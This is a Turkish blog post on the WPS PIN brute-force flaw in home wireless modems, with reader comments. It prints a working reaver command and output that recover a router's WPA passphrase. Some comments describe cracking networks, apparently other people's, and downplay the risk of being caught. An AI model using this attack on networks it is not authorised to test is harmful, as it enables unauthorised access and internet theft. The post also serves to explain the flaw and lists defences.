Artık WPS Destekli Kablosuz Modemleri Kırmak Daha Kolay…

wifi_bigArtık birçok kişi Wlan (kablosuz) destekli modemler kullanmaya başladı.  Özellikle ev, iş yeri ve kafeler gibi ortamlarda bu modemler üzerinden kablosuz cihazlarımızla internete çıkıyoruz. Hele ki evinizde ya da iş yerinizde tablet, cep telefonu gibi kablosuz cihazlar kullanıyorsanız, muhakkak ki tercih edeceğiniz modemler kablosuz olacaktır.  Fakat bu modemlerin kablosuz şifreleri WPS özellikleri sayesinde kolay bir şekilde kırılabilmekte.

WPS destekli kablosuz modemlerde eskisi kadar güvende değiliz! Kablosuz ağlarda geçtiğimiz aylarda tespit edilen WPS açığı sayesinde kablosuz şifreniz ne kadar karmaşık ve uzun olursa olsun birkaç saat hatta birkaç saniye içerisinde kırılarak Wlan ağınıza erişilebiliyor.

WPS Nedir?

Wi-Fi protected Setup olarak isimlendirilen teknoloji, tecrübesiz ve bilgisiz kullanıcıların router ve Wlan destekli modemlerde basit bir şekilde kablosuz ayarları yapmaları için geliştirilmiş bir teknolojidir. Son tüketici modemin bu özelliği sayesinde rahatlıkla kablosuz ayarlarını yapabilmektedir.

Modeminizi ilk kurduğunuzda Wlan ağına bağlanıp modeminizin PIN numarasını (genelde modemin altındaki etikette yazar) girdiğiniz zaman hiçbir teknik bilgi gerekmeden sadece İLERİ yaparak otomatik ayarlar yapılabilmekte.

Güvenlik Zafiyeti…

İşte güvenlik zafiyeti burada başladı.  WPS yani kolay Wlan kurulumu özelliğine sahip modemlerin PIN numaraları 8 hanelidir ve bu kod 4’er rakam ile 2 gruba ayrılmaktadır.  4 haneli bir kodun toplamda 10.000 civarında bir olası kombinasyonu vardır. Kısacası özel yazılımlar sayesinde (Wlan modemin PIN numarasını deneme / yanılma ile tespit eden araçlar) rastgele kombinasyon yöntemleri ile birkaç saat içinde tespit edilebiliyor.  Eğer bütün halinde 8 rakam kombinasyonu olsaydı. Bu süreç günlerce deneme yanılma ile devam edebilirdi. Fakat 4 haneli 2 grup olması çok daha basite inmesine sebep olmakta. İlk 4 hane tespit edildikten sonra modem karşı tarafa ilk dört rakamın doğru olduğu onayını alıyor ve diğer 4 rakam için denemeler başlıyor.

Not: Bazı routerlar 3 kere yanlış denemeden sonra karşı tarafın 4. deneme için 60 saniye beklemesini zorunlu kılıyor ve bir süre bloke ediyor.  Bu yüzden bu tarz modemlerin şifrelerinin kırılma süresi günler sürebilir.

Wlan şifrenizin kırılması da PIN kodunuzun bilinmesine bağlı.  Modemin PIN kodu kırıldıktan sonra Wlan sinyalleri snif edilerek şifre ne kadar zor olursa olsun, ne kadar uzun bir şifre olursa olsun birkaç saat hatta birkaç dakika içerisinde kırılabilmekte! İşte zafiyet burada başlıyor.

WPS Özelliğini Kapatmak…

Birçok modem üreticisi varsayılan olarak WPS özelliğini aktif kılıyor. Bazı modemlerde ise WPS özelliği yok. Eğer bu tarz bir modem kullanıyorsanız kafanız biraz daha rahat olabilir. Yine de Wifi şifresini kırmanın diğer birçok yolu olduğunu söylemek isterim. Eğer modeminiz WPS özelliğine sahipse bu özelliği kapatarak bu güvenlik zafiyetinden korunabilirsiniz. WPS Vulnerability Testing dökümanında ise WPS destekli birçok modemin WPS özelliğini nasıl kapatılacağı belirtilmiş.

Tüm router üreticileri, Wi-Fi Alliance tarafından sertifikalandırılmak için WPS’yi varsayılan olarak açık tutuyor. Ancak router’ınız WPS özelliğine sahip olmayabilir. Modeminizin üzerinde bir WPS düğmesi olup olmadığını kontrol edin. Eğer yoksa, cihazınızın arka tarafında 8 haneli bir PIN kodunu olabilir.

Saldırgan…

Saldırgan, WPS’de bulunan güvenlik zaafiyeti ile bu PIN numarasını tahmin ederse WPA/WPA2 anahtarını ele geçirebiliyor. WPA/WPA2 anahtarı ne kadar karmaşık ve uzun olursa olsun, PIN numarası tahmin edildiğinde anahtar elde edilebilir.

Kaynak: Bilgi Güvenliği Akademisi Blog

WPS Anahtarını ele geçirmek…

WPS anahtarını ele geçirmek için saldırgan öncelikle monitör modu destekleyen bir kart ile ağları tarıyor.  Tarama işlemi sonucunda karşısına gelen Wlan ağlarını tespit edip saldırı moduna geçiliyor.   Saldırgan hedef ağın BSSID değerini ve yayın yaptığı kanalları not alarak diğer bir tool ile PIN numarasını Brute Force (rastgele denemeler) atak kullanarak kırmaya başlıyor.

# reaver -i mon0 -b 33:22:55:22:11:2F -c 9 -vv –no-nack -d 5 -f -x298

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 9
[+] Waiting for beacon from 33:22:55:22:11:2F
[+] Associated with 33:22:55:22:11:2F (ESSID: TEAkolik_Ev)
[+] Trying pin 47128211
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 9 seconds
[+] WPS PIN: ’47128211′
[+] WPA PSK: ‘benimgizliparolam123!#’
[+] AP SSID: ‘TEAkolik_Ev’
[+] Nothing done, nothing to save.

Modemin WPS özelliği kapalıda olsa bile saldırı başarılı olabiliyor. Teorik olarak WPS PIN numarasını tespit etmek maksimum 10 saat sürüyor, pratikte bazı özel durumlarda hedef kablosuz ağa bağlantılar zaman aşımına uğrayabilir ve bu zaman uzayabilir.  Kısacası modem üreticilerini bir kenara bırakırsak bizim yapmamız gerekenler…

  1. WPS özelliğini kapatmak
  2. Mac Filtrelemesi kullanmak
  3. Uzun ve rakam, karakter karışımı şifreler kullanmak
  4. SSID (kablosuz ağ ismi yayınını) yayınını kapatmak

Bu işlemleri yaparsanız biraz daha rahat edebilirsiniz. Yine de unutmamak gerekiyor. WPS özelliği kapalı olsa da, uzuncana karmaşık şifreler kullansanız dahi şifrenizi kırmak onlar için çok da zor değil… Unutmamak gerek, yüzde yüz güvenli bir sistem yoktur. Sadece onları biraz fazla oyalayarak vazgeçmelerini sağlayabilirsiniz. Hele ki yukarıdaki işlemleri yaparsanız en azından Lamer saldırılarından korunmuş olabilirsiniz.

“Artık WPS Destekli Kablosuz Modemleri Kırmak Daha Kolay…” üzerine 28 yorum

  1. Tamam düzeltim pardon .. Sorum olcak, bende trying pin: xxxxxxxx (sayılar var ) fakat psk anahtarına ne kadar sürede ulaşabiliriz onu anlamadım.. Çünkü ben bu sizin yaptığınız atağı yaptım;

    “Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Switching mon0 to channel 9
    [+] Waiting for beacon from 33:22:55:22:11:2F
    [+] Associated with 33:22:55:22:11:2F (ESSID: TEAkolik_Ev)
    [+] Trying pin 47128211
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK

    Tam burada tekrar başa dönüp ,

    Trying pin 47128211
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK

    bu şekilde sürekli aynı şey oluyor , tekrar başa dönüyor , pin numarası görüküyor fakat psk anahtarına ulaşamadım 5 dakika bekledim …

    Yanıtla
  2. gerçekten müthiş bir açık. bunu üretenler nasıl olurda böyle zafiyet gösterebiliyorlar. sırf çalışıp çalışmadığını görmek istedim ve denedim. yaklaşık 3 saat sonunda pin ve psk anahtarını verdi. linux kullanıcısı değilim sırf test etmek için backtrack ı indirdim. şifrenin ne olduğu hiç önemli değil klavyedeki bütün simgeleri dahi koysa eğer modem wps destekli ise kurtuluşu imkansız.

    Yanıtla
  3. ya kardeşim ben altı aydır ugraşıyorum daha tık yokgına geldi eğer pratik bir çözümün varsa mail atta rahatlayayım herkese bol şanslar.

    Yanıtla
  4. arkadaşlar XİOPAN ile de kırabilirsiniz ben 5 saatte kırdım .. akşam koydum gece yarısı 6 da falan kırdı yardım isteyenler mail atsın ….

    Yanıtla
    • siz utanmıyormusunuz başkasının şifresini kırmakta ne oluyo , millet dişinden tırnağından artırıp internet parası ödesin siz insanların şifresini kırıp internetini çalın ayıp lan , yaptığınız yetkisiz erişim ve büyük bir bilişim suçu 6 aydan 2 yıla hapis cezası var , onu bunu bırakın kul hakkı , cennet yüzü göremezsiniz

      Yanıtla
  5. Şimdilik bu açığa karşı en iyi güvence airties cihazlarında var. 4 pin deneme yanılmadan sonra geçici süreyle wps kilidi devreye giriyor ve backtrack pin deneyemediği için “start eapol…” hataları ile doluyor ekran. Şimdiye kadar ttnet’in fiberoptik router’ları tılgın ve airties’ın modemlerinde gördüm bu kilit özelliğini elbet bilmediğim başka birkaç markada da olabilir.

    Yanıtla
  6. selamlar arkadaşlar ben adem wps bazı modem türlerinde kullanılan wpa şifreleme kombinasyonunu destekleyen bi nevi şifreyi şifreleyen bir sistem xiaopan beini backtrack gibi linux açık kaynak kodlu hacker ların kullandığı sistemler sayesinde wps üzerinden modeme bağlanıp wpa wpa2 şifreleri kırılabiliyor web şifreleme farklı yarım saatte beini ile kırılabiliyor.Wireless şifresi konusunda yardım isteyen arkadaşlar

    Yanıtla
  7. Selam arkadaşlar çevremde 5 Modem var vps yerine Psk yazıyo wash -i mon0 giriyorum hata veriyor yardım arkadaşlar

    Yanıtla
  8. kendileri başkasının ağına bağlanıp internet hırsızlığı yapmışken başkalarınıda teşfik ediyo köpekler : ulan hepinizin ağzına sıçim

    Yanıtla
  9. O teorilerin gerçek hayata uyup uymama olayı ise şöyle anlatayım.

    Şimdi şifreyi çözebilmek için önce yakalamanız lazım. Fakat modem ile bilgisayar arasında şifre transferinin olduğu tek an bilgisayarın açıldığı andır. çünkü o an içerisinde ilk kez modeme bağlanır ve şifreyi otomatik olarak bilgisayarınız modeme gönderir. Modemde şifre doğruysa bağlantınızı sağlar değilse sağlamaz.

    Bazı şifrelerin çözülmesi çok uzun sürebilmesinin sebebi budur. Bilgisayar açık olmadığı yada tam tersi açık olduğu ana denk gelindi için şifreyi yakalayacak bir an oluşmuyor. Fakat bir bilgisayarı televizyon gibi günün belli bir saatinde muhakkak kapatıyoruz ve açıyoruz. o yüzden şifrenin yakalanması kaçınılmaz oluyor.

    WEP ile vaktiyle az uğraşmadım eğlenceli şeylerdir. Fakat aşırı indirme yapıp komşularınızı çileden çıkarmayın tadında bırakın 😀

    Yanıtla
  10. wsc_nack uyarısının anlamını açıklar mısınız? kafama takılan sorunlar arasında da.
    Bazı modemlerde bu uyarı alınmadan kırılabiliyor.
    Fakat bu yarıyı aldığım modemlerde illallah etsem de kıramıyorum. günler değil, inatla uğraştığım 1 ayım gitti ama modem bana mısın demedi.. Yardım lütfenn

    Yanıtla
  11. Bilişim suçudur mac adresiniz yakalınır ve 6 aydan 1 yıla yatarı vardır paraya çevrilmeden…..

    Yanıtla
    • Yakalanmanin o kadar kolay oldugunu sanmiyorum. Bir kere etrafta onlarca ev ve cihaz var. Polisin elinde sadece bir MAC adresI varken o kadar evi mahkeme izni olmadan arayamaz. Mahkemeye ne diyecek biri birinin modemine girdi MAC adresini bulmamiz icin 200 tane ev icin arama izni istiyoruz mu 🙂 Biraz mantikli dusunun. Bir kere suclu olan modemin sahibi. Bunun icin onlemler almasi gerekirdi. Ayrica birinin modeminize girip hack yapmasi ve polisin evinize baskin yapmasi durumunda birinin midrminize girdigini kanitlamaniz lazim. Bu da zor gorunuyor. Kanitlasaniz bile yukaridaki aciklandigi gibi hack yapani bulamak neredeyse imkansizdir. Sizin onlemler almaniz gerekiyor oncelikle. Zor sifreleri kimse kolay kiramaz emin olun.

      Yanıtla
  12. Wireless kirmayi illegal olarak gormemek lazim. Tabi illegal olarak da kirilabilir ancak kendi guvenliginiz icin bu islerin nasil yapildigini da bilmeniz gerekiyor. Mesela sifre kirmayi kendi modeminizde deneyip ona gore onlemler alinabilir. Benim tavsiyem WPS yi kapatip zor sifreler kullanin.

    Yanıtla
  13. arkadaşlar şimdi wifiye kimler girdiği bilecez öncelikle modem hesabınıza girin ve DURUM a tıklayın ve altında WLAN yazıyor girdiğimizde WLAN HOST BİLGİSİ YAZIYOR altında kimler giriyorsa maç adresleri var .girenleri engellemek istiyorsanız .öncellikle maç adreslerini kopyalarak TEMEL e tıklıyoruz WLAN yazıyo oraya giriyoruz ve en üste WLAN FİLTRELEME yazıyor.ve maö adreslerini yapıştırarak göndere tıklıyoz ve engelleniyor.

    Yanıtla
  14. İyi günler paylaştığınız önemli we değerli bilgiler için teşekkür ederim. Size bir sorum olacak, TP link W8901g diye bir ADSL modemimiz var, buradaki bilgilerden yararlanarak Mac koruması ekledim modeme.Son günlerde şöyle bir sorun çıkmaya başladı modemin 192.168.1.1 adresini girdiğimde ulaşamıyorum.Modemi yeniden başlatınca düzeliyor sorun. We geçen gün Mac adresine atanan ip adreslere dikkat ettim we komşudan şifreleri değiştirmek için telefonunu istedim, ip adresine baktığımda aynı Mac adresi olmasına rağmen telefon ayarlarında farklı adres geldiğini gördüm. We bu esnada da modemin arayüzü 192.168.1.1 yine yanıt vermemeğe başladı.Düşünüyorum ki, farklı bir Mac adresini değiştirerek Wifi kullanıyorlar. Sahte Mac adreslerini engellemenin bir yolu varmı? Önceden teşekkür ederim.

    Yanıtla

Yorum yapın